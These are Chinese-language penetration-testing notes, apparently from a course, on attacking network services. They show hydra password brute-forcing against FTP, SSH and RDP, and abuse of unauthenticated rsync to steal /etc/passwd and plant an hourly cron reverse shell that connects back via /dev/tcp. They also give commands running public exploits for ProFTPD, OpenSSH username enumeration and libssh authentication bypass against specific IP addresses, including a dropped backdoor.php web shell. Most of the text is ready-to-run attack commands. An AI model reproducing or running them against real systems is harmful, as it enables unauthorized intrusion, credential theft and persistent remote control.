应用协议&Rsync&SSH&RDP&FTP&漏洞批扫&口令猜解
用hydra爆破(弱口令爆破)
FTP(端口:21):文本传输协议 (用户名随机)
RDP(端口:3389),SSH(端口:22):windows,linux上的远程传输协议
RDP用户名(一般是administrator) SSH用户名(一般是root)
hydra是一个自动化的爆破工具,暴力破解弱密码,
用hydra爆破
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为16。
-w TIME 设置最大超时的时间,单位秒,默认是30s。
-v / -V 显示详细过程。
hydra -L test -P 10top1K.txt 目标IP ftp -V
hydra -l root -P 10top1K.txt 目标IP ssh -V
hydra -l administrator -P 10top1K.txt 目标IP rdp -V
L: 指定用户名字典 l:指定用户名 P:指定密码字典
Rsync文件备份(未授权访问)
rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。
判断:rsync rsync://目标IP
利用:
-读取文件:rsync rsync://目标IP/src/
-下载文件:rsync rsync://目标IP/src/etc/passwd ./
-上传文件:rsync -av passwd rsync://目标IP/src/tmp/passwd
反弹shell:
1、获取信息:
rsync rsync://目标IP/src/etc/crontab /root/cron.txt
2.创建文件
touch shell
\#!/bin/bash
/bin/bash -i >& /dev/tcp/本地IP/5566 0>&1
chmod +x shell
3、上传文件
rsync -av shell rsync://目标IP/src/etc/cron.hourly
4、等待接受反弹
利用msf:auxiliary/scanner/rsync/modules_list
协议漏洞-应用软件-FTP&Proftpd搭建
https://github.com/t0kx/exploit-CVE-2015-3306
python exploit.py --host 123.58.236.76 --port 24967 --path "/var/www/html/"
http://123.58.236.76:19758/backdoor.php?cmd=id
协议漏洞-应用软件-SSH&libssh&Openssh
-Openssh CVE-2014-0160 CVE-2018-15473 cve_2020_15778
CVE-2014-0160 版本很少
cve_2020_15778 价值不高
CVE-2018-15473-用户名枚举
https://github.com/Rhynorater/CVE-2018-15473-Exploit
pip3 install -r requirements.txt
pip3 install paramiko==2.4.1
python sshUsernameEnumExploit.py --port 32013 --userList exampleInput.txt 123.58.236.76
libssh 身份验证绕过(CVE-2018-10933)
https://www.seebug.org/vuldb/ssvid-97614
python libssh.py 123.58.236.76 55190 "id"